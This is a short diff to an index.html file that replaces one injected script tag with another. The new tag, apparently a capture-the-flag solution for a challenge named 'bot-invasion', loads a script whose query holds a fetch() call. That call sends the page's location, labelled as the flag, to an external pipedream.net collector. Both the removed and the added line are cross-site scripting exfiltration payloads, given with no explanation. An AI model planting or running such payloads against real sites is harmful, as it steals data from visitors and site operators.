--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script src="/js?q=fetch('https://eo62lwd3xgz14zy.m.pipedream.net/?'+location.href)"></script>
+<script src="https://bot-invasion.challenge.tjcsec.club/js?q=fetch('https://eo62lwd3xgz14zy.m.pipedream.net/?flag='%2Blocation.href)"></script>
